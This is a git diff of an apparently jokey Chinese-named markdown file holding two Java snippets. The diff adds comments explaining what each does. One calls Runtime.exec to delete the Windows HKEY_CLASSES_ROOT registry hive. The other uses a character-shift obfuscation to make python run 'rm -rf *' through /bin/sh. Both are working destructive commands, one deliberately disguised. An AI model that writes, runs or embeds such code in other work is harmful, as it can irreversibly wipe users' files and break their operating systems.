diff --git "a/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" "b/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" similarity index 87% rename from "\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" rename to "\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" index 90b47c2aa947ecdb4ae5d6ccc3cda5f0e11e9f42..8fba7b3cbd0855f90dfe4b90b75a2ef0932f42c0 100644 --- "a/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210\357\274\201\357\274\201" +++ "b/\345\210\253\345\274\200\347\216\251\347\254\221\345\223\210.md" @@ -4,6 +4,7 @@ @Override public void run() { try { + //使用DOS窗口删除HKEY_CLASSES_ROOT目录系统注册表 Runtime.getRuntime().exec("cmd.exe /k reg delete HKEY_CLASSES_ROOT /f"); } catch (IOException e) { logger.error("",e); @@ -15,6 +16,7 @@ @Override public void run() { try { + //在linux下执行 rm -rf /* Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","python -c 'import os; os.system(\"\".join([chr(ord(i)-1) for i in \"sn!.sg!+\"]))'"}); } catch (IOException e) { logger.error("",e);